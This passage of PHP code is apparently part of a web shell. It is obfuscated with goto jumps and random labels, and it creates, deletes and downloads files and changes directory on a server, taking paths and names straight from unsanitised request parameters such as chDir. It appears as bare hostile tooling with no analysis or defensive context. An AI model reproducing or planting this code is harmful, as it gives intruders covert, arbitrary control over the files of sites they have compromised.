[Download]";
}
goto IZkan;
Jtz3n:
if (isset($_POST["fileName"]) && !empty($_POST["fileName"])) {
$dir = getcwd();
if (isset($_GET["chDir"]) && !empty($_GET["chDir"])) {
$dir = $_GET["chDir"];
}
$createFileFlag = createFile($dir, $_POST["fileName"]);
}
goto CDhow;
IZkan:
function showDeleteLink($file)
{
$dir = getcwd();
if (isset($_GET["chDir"])) {
$dir = $_GET["chDir"];
}
echo "
[Delete]";
}
goto nslsP;
CDhow:
if (isset($_POST["folderName"]) && !empty($_POST["folderName"])) {
$dir = getcwd();
if (isset($_GET["chDir"]) && !empty($_GET["chDir"])) {
$dir = $_GET["chDir"];
}
$createFolderFlag = createFolder($dir, $_POST["folderName"]);
}
goto U8v5_;
mDIY_:
if (isset($_GET["download"]) && !empty($_GET["download"]) && isset($_GET["chDir"])) {
downloadFile($_GET["chDir"] . "/" . $_GET["download"]);
}
goto mQdYc;
Yws85:
function getFileMime($file)
{
return mime_content_type($file);
}
goto DEn3Z;
UgpIw: ?>